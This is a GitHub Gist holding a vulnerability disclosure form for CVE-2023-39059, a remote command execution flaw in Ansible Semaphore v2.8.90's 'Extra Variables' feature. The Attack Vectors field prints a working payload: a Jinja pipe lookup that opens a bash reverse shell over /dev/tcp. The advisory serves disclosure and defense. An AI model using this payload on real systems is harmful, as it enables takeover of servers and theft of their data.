Last active
August 24, 2023 06:18
-
-
Save Alevsk/1757da24c5fb8db735d392fd4146ca3a to your computer and use it in GitHub Desktop.
CVE-2023-39059
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--------------------------------------------------------------- | |
[VulnerabilityType Other] | |
Remote Command Execution (RCE) | |
--------------------------------------------------------------- | |
[Affected Component] | |
Ansible Semaphore includes a feature called "Extra Variables." This feature can be accessed at https://<semaphore-endpoint>/project/id/environment and is directly associated with the ansible-playbook --extra-vars flag. | |
--------------------------------------------------------------- | |
[Attack Type] | |
Remote | |
--------------------------------------------------------------- | |
[Impact Code execution] | |
true | |
--------------------------------------------------------------- | |
[Impact Denial of Service] | |
true | |
--------------------------------------------------------------- | |
[Impact Escalation of Privileges] | |
true | |
--------------------------------------------------------------- | |
[Impact Information Disclosure] | |
true | |
--------------------------------------------------------------- | |
[Attack Vectors] | |
The --extra-vars parameter can be abused by a malicious user with low privileges to achieve Remote Command Execution (RCE) and read files and configurations, perform Server Side Request Forgery (SSRF), execute commands, and establish a reverse shell on the ansible server. Payload: | |
{"ansible_user": "{{ lookup('ansible.builtin.pipe', \"bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1337 <&1'\") }}"} | |
--------------------------------------------------------------- | |
[Has vendor confirmed] | |
true | |
--------------------------------------------------------------- | |
[Discoverer] | |
@alevsk | |
--------------------------------------------------------------- | |
[Reference] | |
https://www.alevsk.com/2023/07/a-quick-story-of-security-pitfalls-with-execcommand-in-software-integrations/ | |
--------------------------------------------------------------- | |
[Vendor of Product] | |
ansible semaphore | |
--------------------------------------------------------------- | |
[Affected Product Code Base] | |
ansible semaphore v2.8.90 | |
--------------------------------------------------------------- |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment